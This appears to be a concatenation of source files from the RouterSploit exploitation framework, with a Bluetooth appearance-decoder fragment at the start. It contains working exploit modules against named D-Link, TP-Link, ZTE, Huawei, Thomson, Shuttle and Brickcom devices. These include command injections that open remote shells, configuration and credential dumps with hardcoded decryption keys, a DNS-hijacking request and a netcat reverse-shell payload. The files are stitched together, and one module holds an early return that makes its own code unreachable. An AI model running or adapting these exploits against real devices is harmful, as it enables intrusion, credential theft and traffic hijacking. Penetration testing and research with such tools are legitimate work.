    def _get_char(self, char, props):
        string = ""
        if "READ" in props and "INDICATE" not in props:
            try:
                data = char.read()

                if char.uuid == AssignedNumbers.appearance:
                    string = self._get_appearance(data)
                else:
                    try:
                        string = color_blue(repr(data.decode("utf-8")))
                    except Exception:
                        string = repr(data)

            except Exception:
                pass

        return string

    def _get_appearance(self, data):
        appearance = {
            0: "Unknown",
            64: "Generic Phone",
            128: "Generic Computer",
            192: "Generic Watch",
            193: "Watch: Sports Watch",
            256: "Generic Clock",
            320: "Generic Display",
            384: "Generic Remote Control",
            448: "Generic Eye-glasses",
            512: "Generic Tag",
            576: "Generic Keyring",
            640: "Generic Media Player",
            704: "Generic Barcode Scanner",
            768: "Generic Thermometer",
            769: "Thermometer: Ear",
            832: "Generic Heart rate Sensor",
            833: "Heart Rate Sensor: Heart Rate Belt",
            896: "Generic Blood Pressure",
            897: "Blood Pressure: Arm",
            898: "Blood Pressure: Wrist",
            960: "Human Interface Device (HID)",
            961: "Keyboard",
            962: "Mouse",
            963: "Joystick",
            964: "Gamepad",
            965: "Digitizer Tablet",
            966: "Card Reader",
            967: "Digital Pen",
            968: "Barcode Scanner",
            1024: "Generic Glucose Meter",
            1088: "Generic: Running Walking Sensor",
            1089: "Running Walking Sensor: In-Shoe",
            1090: "Running Walking Sensor: On-Shoe",
            1091: "Running Walking Sensor: On-Hip",
            1152: "Generic: Cycling",
            1153: "Cycling: Cycling Computer",
            1154: "Cycling: Speed Sensor",
            1155: "Cycling: Cadence Sensor",
            1156: "Cycling: Power Sensor",
            1157: "Cycling: Speed and Cadence Sensor",
            1216: "Generic Control Device",
            1217: "Switch",
            1218: "Multi-switch",
            1219: "Button",
            1220: "Slider",
            1221: "Rotary",
            1222: "Touch-panel",
            1280: "Generic Network Device",
            1281: "Access Point",
            1344: "Generic Sensor",
            1345: "Motion Sensor",
            1346: "Air Quality Sensor",
            1347: "Temperature Sensor",
            1348: "Humidity Sensor",
            1349: "Leak Sensor",
            1350: "Smoke Sensor",
            1351: "Occupancy Sensor",
            1352: "Contact Sensor",
            1353: "Carbon Monoxide Sensor",
            1354: "Carbon Dioxide Sensor",
            1355: "Ambient Light Sensor",
            1356: "Energy Sensor",
            1357: "Color Light Sensor",
            1358: "Rain Sensor",
            1359: "Fire Sensor",
            1360: "Wind Sensor",
            1361: "Proximity Sensor",
            1362: "Multi-Sensor",
            1408: "Generic Light Fixtures",
            1409: "Wall Light",
            1410: "Ceiling Light",
            1411: "Floor Light",
            1412: "Cabinet Light",
            1413: "Desk Light",
            1414: "Troffer Light",
            1415: "Pendant Light",
            1416: "In-ground Light",
            1417: "Flood Light",
            1418: "Underwater Light",
            1419: "Bollard with Light",
            1420: "Pathway Light",
            1421: "Garden Light",
            1422: "Pole-top Light",
            1423: "Spotlight",
            1424: "Linear Light",
            1425: "Street Light",
            1426: "Shelves Light",
            1427: "High-bay / Low-bay Light",
            1428: "Emergency Exit Light",
            1472: "Generic Fan",
            1473: "Ceiling Fan",
            1474: "Axial Fan",
            1475: "Exhaust Fan",
            1476: "Pedestal Fan",
            1477: "Desk Fan",
            1478: "Wall Fan",
            1536: "Generic HVAC",
            1537: "Thermostat",
            1600: "Generic Air Conditioning",
            1664: "Generic Humidifier",
            1728: "Generic Heating",
            1729: "Radiator",
            1730: "Boiler",
            1731: "Heat Pump",
            1732: "Infrared Heater",
            1733: "Radiant Panel Heater",
            1734: "Fan Heater",
            1735: "Air Curtain",
            1792: "Generic Access Control",
            1793: "Access Door",
            1794: "Garage Door",
            1795: "Emergency Exit Door",
            1796: "Access Lock",
            1797: "Elevator",
            1798: "Window",
            1799: "Entrance Gate",
            1856: "Generic Motorized Device",
            1857: "Motorized Gate",
            1858: "Awning",
            1859: "Blinds or Shades",
            1860: "Curtains",
            1861: "Screen",
            1920: "Generic Power Device",
            1921: "Power Outlet",
            1922: "Power Strip",
            1923: "Plug",
            1924: "Power Supply",
            1925: "LED Driver",
            1926: "Fluorescent Lamp Gear",
            1927: "HID Lamp Gear",
            1984: "Generic Light Source",
            1985: "Incandescent Light Bulb",
            1986: "LED Bulb",
            1987: "HID Lamp",
            1988: "Fluorescent Lamp",
            1989: "LED Array",
            1990: "Multi-Color LED Array",
            3136: "Generic: Pulse Oximeter",
            3137: "Fingertip",
            3138: "Wrist Worn",
            3200: "Generic: Weight Scale",
            3264: "Generic",
            3265: "Powered Wheelchair",
            3266: "Mobility Scooter",
            3328: "Generic",
            5184: "Generic: Outdoor Sports Activity",
            5185: "Location Display Device",
            5186: "Location and Navigation Display Device",
            5187: "Location Pod",
            5188: "Location and Navigation Pod",
        }

        try:
            code = struct.unpack("h", data)[0]

            if code in appearance.keys():
                return color_green(appearance[code])
        except Exception:
            pass

        return repr(data)



from Crypto.Cipher import DES
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "TP-Link WDR842ND configure Disclosure",
        "description": "Module exploits TP-Link WDR842ND configure "
                       "disclosure vulnerability which allows fetching configure.",
        "authors": (
            "qingdaoxiaoge <qdpp007[at]outlook.com>",  # vulnerability discovery
            "VegetableCat <yes-reply[at]linux.com>",  # routersploit module
        ),
        "references": (
            "http://cb.drops.wiki/bugs/wooyun-2015-0110062.html",
        ),
        "devices": (
            "TP-Link WDR842ND",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def decrypt_authKey(self, authKey):
        matrix = [[0 for _ in range(15)] for _ in range(15)]
        passwdLen = 0
        strDe = "RDpbLfCPsJZ7fiv"
        dic = "yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD" \
              "02KZciXTysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV5" \
              "7fQMc8L6aLgMLwygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oB" \
              "wmCAHoic4HYbUyVeU3sfQ1xtXcPcf1aT303wAQhv66qzW"

        passwd = ''
        for crIndex in range(0, 15):
            passwdList = ''
            strComp_authkey = authKey[crIndex]
            codeCr = ord(strDe[crIndex])
            for index in range(32, 127):
                strtmp = chr(index)
                codeCl = ord(strtmp[0])
                strDic = dic[(codeCl ^ codeCr) % 255]
                if strComp_authkey == strDic:
                    passwdList += strtmp
            matrix[crIndex] = passwdList

        for i in range(0, 15):
            if len(matrix[i]) == 0:
                passwdLen = i
                break
            elif i == 14:
                passwdLen = 15
        for i in range(0, passwdLen):
            passwd += matrix[i] + '\n'
        return passwd

    def parse(self, data):
        parts = data.split(b'\r\n')
        del parts[0]
        for item in parts:
            try:
                if 'authKey' in item:
                    authKey = item.split()[1]
                if 'cPskSecret' in item:
                    cPskSecret = item.split()[1]
                if 'cUsrPIN' in item:
                    cUsrPIN = item.split()[1]
            except Exception:
                pass
        return authKey, cPskSecret, cUsrPIN

    def decrypt_config_bin(self, data):
        key = b"\x47\x8D\xA5\x0B\xF9\xE3\xD2\xCF"
        crypto = DES.new(key, DES.MODE_ECB)
        data_decrypted = crypto.decrypt(data).rstrip('\0')
        authKey, cPskSecret, cUsrPIN = self.parse(data_decrypted)
        passwd = self.decrypt_authKey(authKey)
        return passwd, authKey, cPskSecret, cUsrPIN

    def run(self):
        if self.check():
            print_success("Target is vulnerable")

            print_status("Sending payload request")
            response = self.http_request(
                method="GET",
                path="/config.bin",
            )
            return None

            if response is not None and response.status_code == 200:
                print_success("Exploit success")
                print_status("Reading file config.bin")
                password, authKey, cPskSecret, cUsrPIN = self.decrypt_config_bin(
                    response.content)
                print_success("Found cPskSecret:" + cPskSecret)
                print_success("Found cUsrPIN:" + cUsrPIN)
                print_success("Found authKey:" + authKey)
                print_success("Password combination from top to bottom:" + '\n' + password)

        else:
            print_error("Exploit failed. Device seems to be not vulnerable.")

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/config.bin",
        )
        if response is None:
            return False  # target is not vulnerable

        if response.status_code == 200 and 'x-bin/octet-stream' in response.headers['Content-Type']:
            return True  # target is vulnerable

        else:
            return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.core.udp.udp_client import UDPClient


class Exploit(UDPClient):
    __info__ = {
        "name": "D-Link DIR-815 & DIR-850L RCE",
        "description": "Module exploits D-Link DIR-815 and DIR-850L Remote Code Execution vulnerability "
                       "which allows executing command on the device.",
        "authors": (
            "Samuel Huntley",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/38715/",
        ),
        "devices": (
            "D-Link DIR-815",
            "D-Link DIR-850L",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(1900, "Target UPNP port")

    def run(self):
        print_status("It's not possible to check if the target is vulnerable. Try to use following command loop.")
        print_status("Invoking command loop...")
        print_status("It is blind command injection, response is not available")
        shell(self, architecture="mipsle")

    def execute(self, cmd):
        request = (
            "M-SEARCH * HTTP/1.1\r\n" +
            "HOST:{}:{}\r\n".format(self.target, self.port) +
            "ST:urn:schemas-upnp-org:service:WANIPConnection:1;{};ls\r\n".format(cmd) +
            "MX:2\r\n" +
            "MAN:\"ssdp:discover\"\r\n\r\n"
        )

        request = bytes(request, "utf-8")

        udp_client = self.udp_create()
        udp_client.send(request)
        udp_client.close()

        return ""

    @mute
    def check(self):
        return None  # it is not possible to check if target is vulnerable without exploiting it



from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin


class Payload(ReverseTCPPayloadMixin, GenericPayload):
    __info__ = {
        "name": "Netcat Reverse TCP",
        "description": "Creates interactive tcp reverse shell by using netcat.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
    }

    cmd = OptString("nc", "Netcat binary")
    shell_binary = OptString("/bin/sh", "Shell")

    def generate(self):
        return "{} {} {} -e {}".format(self.cmd,
                                       self.lhost,
                                       self.lport,
                                       self.shell_binary)



from routersploit.core.exploit import *
from routersploit.core.snmp.snmp_client import SNMPClient


class Exploit(SNMPClient):
    __info__ = {
        "name": "Thomson TWG849 Info Disclosure",
        "description": "Module exploits Thomson TWG849 information disclosure vulnerability which allows reading sensitive information.",
        "authors": (
            "Sebastian Perez",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://packetstormsecurity.com/files/133631/Thomson-CableHome-Gateway-DWG849-Information-Disclosure.html",
        ),
        "devices": (
            "Thomson TWG849",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(161, "Target SNMP port")

    verbosity = OptBool(False, "Enable verbose output: true/false")

    def __init__(self):
        self.oids = {
            # make, model, software version
            "model": "1.3.6.1.2.1.1.1.0",
            "uptime": "1.3.6.1.2.1.1.3.0",

            # web interface credentials
            "username": "1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0",
            "password": "1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0",

            # ssid and key
            "ssid1": "1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.32",
            "ssid2": "1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.2.32",

            # guest network oids
            "guest1": "1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.33",
            "guest2": "1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.34",
            "guest3": "1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.35",
        }

    def run(self):
        res = []

        print_status("Reading parameters...")
        for name in self.oids.keys():
            snmp_client = self.snmp_create()
            snmp = snmp_client.get("private", self.oids[name])
            if snmp:
                value = str(snmp[0][1])

                if value:
                    res.append((name, value))

        if res:
            print_success("Exploit success")
            print_table(("Parameter", "Value"), *res)
        else:
            print_error("Exploit failed - could not read sensitive information")

    @mute
    def check(self):
        snmp_client = self.snmp_create()
        snmp = snmp_client.get("private", "1.3.6.1.2.1.1.1.0")
        if snmp:
            return True  # target is not vulnerable

        return False  # target is vulnerable



import re
import time
import requests
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "ZTE ZXV10 RCE",
        "description": "Exploits ZTE ZXV10 H108L remote code execution vulnerability "
                       "that allows executing commands on operating system level.",
        "authors": (
            "Anastasios Stasinopoulos",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://github.com/stasinopoulos/ZTExploit/",
        ),
        "devices": (
            "ZTE ZXV10 H108L",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    username = OptString("root", "Username to log in with")
    password = OptString("W!n0&oO7.", "Password to log in with")

    def __init__(self):
        self.session = requests.Session()

    def run(self):
        if self.login():
            print_success("Target seems to be vulnerable")
            self.info()

            print_status("Invoking command loop")
            shell(self, architecture="mipsbe", method="wget", location="/tmp")
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    def execute(self, cmd):
        path = "/getpage.gch?pid=1002&nextpage=manager_dev_ping_t.gch&Host=;echo $({})&NumofRepeat=1&" \
               "DataBlockSize=64&DiagnosticsState=Requested&IF_ACTION=new&IF_IDLE=submit".format(cmd)

        try:
            response = self.http_request(
                method="GET",
                path=path,
                session=self.session
            )
            time.sleep(3)

            response = self.http_request(
                method="GET",
                path="/getpage.gch?pid=1002&nextpage=manager_dev_ping_t.gch",
                session=self.session
            )
            time.sleep(1)

            res = re.findall(r'textarea_1">(.*) -c', response.text)
            if len(res):
                return res[0]
            else:
                res1 = re.findall(r'textarea_1">(.*)', response.text)
                if res1[0] == "-c 1 -s 64":
                    return ""
                else:
                    res2 = re.findall(r'(.*) -c', response.text)
                    res = res1 + res2
                    if res[0] != "</textarea>":
                        return res[0]
        except Exception:
            pass

        return ""

    def info(self):
        try:
            response = self.http_request(
                method="GET",
                path="/template.gch",
                session=self.session
            )
        except Exception:
            return

        # Check for Model Name
        Frm_ModelName = re.findall(r'Frm_ModelName" class="tdright">(.*)<', response.text)
        if len(Frm_ModelName):
            print_status("Model Name: {}".format(Frm_ModelName[0]))

        # Check for Serial Number
        Frm_SerialNumber = re.findall(r'Frm_SerialNumber" class="tdright">(.*)', response.text)
        if len(Frm_SerialNumber):
            print_status("Serial Number: {}".format(Frm_SerialNumber[0]))

        # Check for Hardware Version
        Frm_HardwareVer = re.findall(r'Frm_HardwareVer" class="tdright">(.*)<', response.text)
        if len(Frm_HardwareVer):
            print_status("Software Version: {}".format(Frm_HardwareVer[0]))

        # Check for Boot Loader Version
        Frm_BootVer = re.findall(r'Frm_BootVer"  class="tdright">(.*)<', response.text)
        if len(Frm_BootVer):
            print_status("Boot Loader Version: {}".format(Frm_BootVer[0]))

    def login(self):
        try:
            response = self.http_request(
                method="GET",
                path="/",
                session=self.session
            )
            if response is None:
                return

            print_status("Retrieving random login token...")
            Frm_Logintoken = re.findall(r'Frm_Logintoken"\).value = "(.*)";', response.text)

            if len(Frm_Logintoken):
                Frm_Logintoken = Frm_Logintoken[0]
                print_status("Trying to log in with credentials {} : {}".format(self.username, self.password))

                data = {
                    "Frm_Logintoken": Frm_Logintoken,
                    "Username": self.username,
                    "Password": self.password
                }

                response = self.http_request(
                    method="POST",
                    path="/login.gch",
                    session=self.session,
                    data=data
                )
                if ("Username" not in response.text and "Password" not in response.text and
                   "404 Not Found" not in response.text and response.status_code != 404):
                    print_success("Successful authentication")
                    return True
        except Exception:
            pass

        return False

    @mute
    def check(self):
        if self.login():
            return True  # target is vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Brickcom Corp Network Camera Conf Disclosure",
        "description": "Module exploits Brickcom Corporation Network Camera Configuration Dislosure vulnerability. If target is vulnerable "
                       "it is possible to read device configuration including administrative credentials.",
        "authors": (
            "Orwelllabs",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/39696/",
        ),
        "devices": (
            "Brickcom FB-100Ae IP Box Camera - Firmware Version: v3.0.6.12 (release:09/08/2010 14:46)",
            "Brickcom WCB-100Ap Wireless Camera - Firmware Version: v3.0.6.26 (release:01/21/2011 18:31)",
            "Brickcom VD-202Ne Vandal Dome Camera - Firmware Version: v37019_Promise (release:2015-10-01_18:46:07)",
            "Brickcom VD-300Np Vandal Dome Camera - Firmware Version: v3.7.0.23T (release:2016-03-21_10:08:24)",
            "Brickcom VD-E200Nf Vandal Dome Camera - Firmware Version: v3.7.0.5T (release:2015-06-25_11:18:07)",
            "Brickcom OB-202Ne Bullet Camera - Firmware Version: v3.7.0.18R (release:2015-09-08_18:40:11)",
            "Brickcom OB-E200Nf Bullet Camera - Firmware Version: v3.7.0.18.3R (release:2015-10-16_11:36:46)",
            "Brickcom OB-200Np-LR Bullet Camera - Firmware Version: v3.7.0.18.3R (release:2015-10-15_11:30:46)",
            "Brickcom OB-500Ap Bullet Camera - Firmware Version: v3.7.0.1cR (release:2016-01-18_10:07:03)",
            "Brickcom GOB-300Np Bullet Camera (Unique Series) - Firmware Version: v3.7.0.17A (release: 2015-07-10_11:36:41)",
            "Brickcom OB-200Np-LR Bullet Camera (Unique Series) - Firmware Version: v3.7.0.18.3R (release: 2015-10-15_11:30:46)",
            "Brickcom MD-300Np Mini Dome Camera - Firmware Version: v3.2.2.8 (release:2013-08-01)",
            "Brickcom CB-102Ae V2 Cube Camera - Firmware Version: v3.0.6.12 (release: 09/07/2010 11:45)",
            "Brickcom FD-202Ne Fixed Dome Camera - Firmware Version:v3.7.0.17R (release: 2015-08-19_18:47:31)",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def __init__(self):
        self.paths = (
            "/configfile.dump?action=get",
            "/configfile.dump.backup",
            "/configfile.dump.gz",
            "/configfile.dump",
        )

        self.content = None
        self.valid_path = None

    def run(self):
        if self.check():
            print_success("Target seems to be vulnerable")
            print_status("Dumping configuration...")
            print_status("URL: {}".format(self.get_target_url(path=self.valid_path)))

            dump_size = 10000
            if len(self.content) > dump_size:
                print_status("Content too big to display - showing first {} characters.".format(dump_size))
                print_info(self.content[:dump_size])  # max 10000 characters
                print_info("(..)")
            else:
                print_info(self.content)
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):
        for path in self.paths:
            response = self.http_request(
                method="GET",
                path=path,
            )

            if response is None:
                break

            if any([setting in response.text for setting in ["DeviceBasicInfo", "UserSetSetting", "DDNSSetting"]]):
                self.content = response.text
                self.valid_path = path
                return True  # target is vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Shuttle 915 WM DNS Change",
        "description": "Module exploits Shuttle Tech ADSL Modem-Router 915 WM dns change vulnerability. "
                       "If the target is vulnerable it is possible to change dns settings.",
        "authors": (
            "Todor Donev <todor.doven[at]gmail.com>",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/35995/",
            "https://github.com/jh00nbr/Routerhunter-2.0",
        ),
        "devices": (
            "Shuttle Tech ADSL Modem-Router 915 WM",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    dns1 = OptString('8.8.8.8', 'Primary DNS Server')
    dns2 = OptString('8.8.4.4', 'Seconary DNS Server')

    def run(self):
        path = "/dnscfg.cgi?dnsPrimary={}&dnsSecondary={}&dnsDynamic=0&dnsRefresh=1".format(self.dns1,
                                                                                            self.dns2)

        print_status("Attempting to change DNS settings...")
        print_status("Primary DNS: {}".format(self.dns1))
        print_status("Secondary DNS: {}".format(self.dns2))

        response = self.http_request(
            method="POST",
            path=path
        )
        if response is None:
            return

        if response.status_code == 200:
            print_success("DNS settings has been changed")
        else:
            print_error("Could not change DNS settings")

    @mute
    def check(self):
        # it is not possible to check if the target is vulnerable without exploiting device (changing dns)
        return None



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Huawei Router HG532 RCE",
        "description": "Module exploits remote command execution in Huawei Router HG532 devices. "
                       "If the target is vulnerable, command loop is invoked that allows executing commands "
                       "on operating system level.",
        "authors": (
            "@jnazario",  # routersploit module
        ),
        "references": (
            "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17215",
            "http://www.huawei.com/en/psirt/security-notices/huawei-sn-20171130-01-hg532-en",
            "https://pastebin.com/4nzunPB5",
        ),
        "devices": (
            "Huawei HG532",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(37215, "Target HTTP port")
    username = OptString("dslf-config", "Username to log in")
    password = OptString("admin", "Password to log in")

    def run(self):
        if self.check():
            print_success("Target appears to be vulnerable")
            print_status("Invoking command loop...")
            shell(self)
        else:
            print_error("Target is not vulnerable")

    def execute(self, cmd):
        payload = "<?xml version=\"1.0\" ?>\n    <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n    <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n    <NewStatusURL>$(" + cmd + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n    </s:Body>\n    </s:Envelope>"
        response = self.http_request(
            method='POST',
            path='/ctrlt/DeviceUpgrade_1',
            data=payload,
            auth=(self.username, self.password)
        )

        return response.text

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/"
        )

        if response is not None and 'server' in response.headers.keys() and "Linux uPnP/1.0 Huawei-ATP-IGD" in response.headers['server']:
            return True  # target is vulnerable

        return False  # target is not vulnerable



import os
import threading
import time
from itertools import chain
from functools import wraps

from routersploit.core.exploit.printer import (
    print_status,
    thread_output_stream,
)
from routersploit.core.exploit.option import Option

GLOBAL_OPTS = {}


class Protocol:
    CUSTOM = "custom"
    TCP = "custom/tcp"
    UDP = "custom/udp"
    FTP = "ftp"
    FTPS = "ftps"
    SSH = "ssh"
    TELNET = "telnet"
    HTTP = "http"
    HTTPS = "https"
    SNMP = "snmp"


class ExploitOptionsAggregator(type):
    """ Metaclass for exploit base class.

    Metaclass is aggregating all possible Attributes that user can set
    for tab completion purposes.
    """

    def __new__(cls, name, bases, attrs):
        try:
            base_exploit_attributes = chain([base.exploit_attributes for base in bases])
        except AttributeError:
            attrs["exploit_attributes"] = {}
        else:
            attrs["exploit_attributes"] = {k: v for d in base_exploit_attributes for k, v in d.items()}

        for key, value in attrs.copy().items():
            if isinstance(value, Option):
                value.label = key
                attrs["exploit_attributes"].update({key: [value.display_value, value.description, value.advanced]})
            elif key == "__info__":
                attrs["_{}{}".format(name, key)] = value
                del attrs[key]
            elif key in attrs["exploit_attributes"]:  # removing exploit_attribtue that was overwritten
                del attrs["exploit_attributes"][key]  # in the child and is not an Option() instance

        return super(ExploitOptionsAggregator, cls).__new__(cls, name, bases, attrs)


class BaseExploit(metaclass=ExploitOptionsAggregator):
    @property
    def options(self):
        """ Returns list of options that user can set.

        Returns list of options aggregated by
        ExploitionOptionsAggegator metaclass that user can set.

        :return: list of options that user can set
        """

        return list(self.exploit_attributes.keys())

    def __str__(self):
        return self.__module__.split('.', 2).pop().replace('.', os.sep)


class Exploit(BaseExploit):
    """ Base class for exploits """

    target_protocol = Protocol.CUSTOM

    def run(self):
        raise NotImplementedError("You have to define your own 'run' method.")

    def check(self):
        raise NotImplementedError("You have to define your own 'check' method.")

    def run_threads(self, threads_number: int, target_function: any, *args, **kwargs) -> None:
        """ Run function across specified number of threads

        :param int thread_number: number of threads that should be executed
        :param func target_function: function that should be executed accross specified number of threads
        :param any args: args passed to target_function
        :param any kwargs: kwargs passed to target function
        :return None
        """

        threads = []
        threads_running = threading.Event()
        threads_running.set()

        for thread_id in range(int(threads_number)):
            thread = threading.Thread(
                target=target_function,
                args=chain((threads_running,), args),
                kwargs=kwargs,
                name=f"thread-{thread_id}",
            )
            threads.append(thread)

            # print_status("{} thread is starting...".format(thread.name))
            thread.start()

        start = time.time()
        try:
            while thread.is_alive():
                thread.join(1)

        except KeyboardInterrupt:
            threads_running.clear()

        for thread in threads:
            thread.join()
            # print_status("{} thread is terminated.".format(thread.name))

        print_status("Elapsed time: {0:.4f} seconds".format(round(time.time() - start, 2)))


def multi(fn):
    """ Decorator for exploit.Exploit class

    Decorator that allows to feed exploit using text file containing
    multiple targets definition. Decorated function will be executed
    as many times as there is targets in the feed file.

    WARNING:
    Important thing to remember is fact that decorator will
    supress values returned by decorated function. Since method that
    perform attack is not supposed to return anything this is not a problem.

    """

    @wraps(fn)
    def wrapper(self, *args, **kwargs):
        if self.target.startswith("file://"):
            original_target = self.target
            original_port = self.port

            _, _, feed_path = self.target.partition("file://")
            try:
                with open(feed_path) as file_handler:
                    for target in file_handler:
                        target = target.strip()
                        if not target:
                            continue

                        self.target, _, port = target.partition(":")
                        if port:
                            self.port = port
                        else:
                            self.port = original_port

                        fn(self, *args, **kwargs)
                    self.target = original_target
                    self.port = original_port
                    return  # Nothing to return, ran multiple times

            except IOError:
                return
        else:
            return fn(self, *args, **kwargs)

    return wrapper


class DummyFile(object):
    """ Mocking file object. Optimilization for the "mute" decorator. """
    def write(self, x):
        pass


def mute(fn):
    """ Suppress function from printing to sys.stdout """

    @wraps(fn)
    def wrapper(self, *args, **kwargs):
        thread_output_stream.setdefault(threading.current_thread(), []).append(DummyFile())
        try:
            return fn(self, *args, **kwargs)
        finally:
            thread_output_stream[threading.current_thread()].pop()
    return wrapper


class LockedIterator:
    def __init__(self, it):
        self.lock = threading.Lock()
        self.it = it.__iter__()

    def __iter__(self):
        return self

    def next(self):
        self.lock.acquire()
        try:
            item = next(self.it)

            if isinstance(item, tuple):
                return (item[0].strip(), item[1].strip())
            elif isinstance(item, str):
                return item.strip()

            return item
        finally:
            self.lock.release()



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "D-Link Multi HNAP RCE",
        "description": "Module exploits HNAP remote code execution vulnerability in multiple D-Link "
                       "devices which allows executing commands on the device.",
        "authors": (
            "Samuel Huntley",  # vulnerability discovery
            "Craig Heffner",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/37171/",
            "https://www.exploit-db.com/exploits/38722/",
            "http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/",
        ),
        "devices": (
            "D-Link DIR-645",
            "D-Link AP-1522 revB",
            "D-Link DAP-1650 revB",
            "D-Link DIR-880L",
            "D-Link DIR-865L",
            "D-Link DIR-860L revA",
            "D-Link DIR-860L revB",
            "D-Link DIR-815 revB",
            "D-Link DIR-300 revB",
            "D-Link DIR-600 revB",
            "D-Link DIR-645",
            "D-Link TEW-751DR",
            "D-Link TEW-733GR",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_status("Target might be vulnerable - it is hard to verify")
            print_status("Invoking command loop...")
            print_status("It is blind command injection, response is not available")
            shell(self, architecture="mipsle")
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    def execute(self, cmd):
        cmd_new = "cd && cd tmp && export PATH=$PATH:. && {}".format(cmd)
        soap_action = '"http://purenetworks.com/HNAP1/GetDeviceSettings/`{}`"'.format(cmd_new)
        headers = {"SOAPAction": soap_action}

        self.http_request(
            method="POST",
            path="/HNAP1/",
            headers=headers
        )
        return ""

    @mute
    def check(self):
        headers = {"SOAPAction": '"http://purenetworks.com/HNAP1/GetDeviceSettings"'}

        response = self.http_request(
            method="GET",
            path="/HNAP1/",
            headers=headers
        )
        if response is None:
            return False  # target is not vulnerable

        if response.status_code == 200 and "D-Link" in response.text and "SOAPActions" in response.text:
            return True  # target is vulnerable

        return False  # target is not vulnerable



import os
import json
from routersploit.core.exploit import *
from routersploit.core.ssh.ssh_client import SSHClient


class Exploit(SSHClient):
    __info__ = {
        "name": "Multi SSH Authorized Keys",
        "description": "Module exploits private key exposure vulnerability. If the target is "
                       "vulnerable it is possible to authentiate to the device.",
        "authors": (
            "xistence <xistence[at]0x90.nl>",  # Quantum DXi V1000, Array Networks, Loadbalancer.org Enterprise VA 7.5.2 vulnerability discovery
            "Cristiano Maruti (@cmaruti)",  # Baracuda Load Balancer vulnerabiltiy discovery
            "Jasper Greve",  # Ceragon FibeAir IP-10 vulnerability doscovery
            "HD Moore",  # Ceragon FibeAir IP-10 vulnerability discovery
            "Matta Consulting",  # F5 BigIP
            "egypt",  # ExaGrid
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://github.com/rapid7/ssh-badkeys",
            "http://packetstormsecurity.com/files/125761/Array-Networks-vxAG-xAPV-Privilege-Escalation.html",
            "http://seclists.org/fulldisclosure/2015/Jan/76",
            "https://github.com/cmaruti/reports/raw/master/barracuda_load_balancer_vm.pdf",
            "https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15",
            "https://www.trustmatta.com/advisories/MATTA-2012-002.txt",
            "https://community.rapid7.com/community/metasploit/blog/2012/06/11/scanning-for-vulnerable-f5-bigips-with-metasploit",
            "http://packetstormsecurity.com/files/125754/Loadbalancer.org-Enterprise-VA-7.5.2-Static-SSH-Key.html",
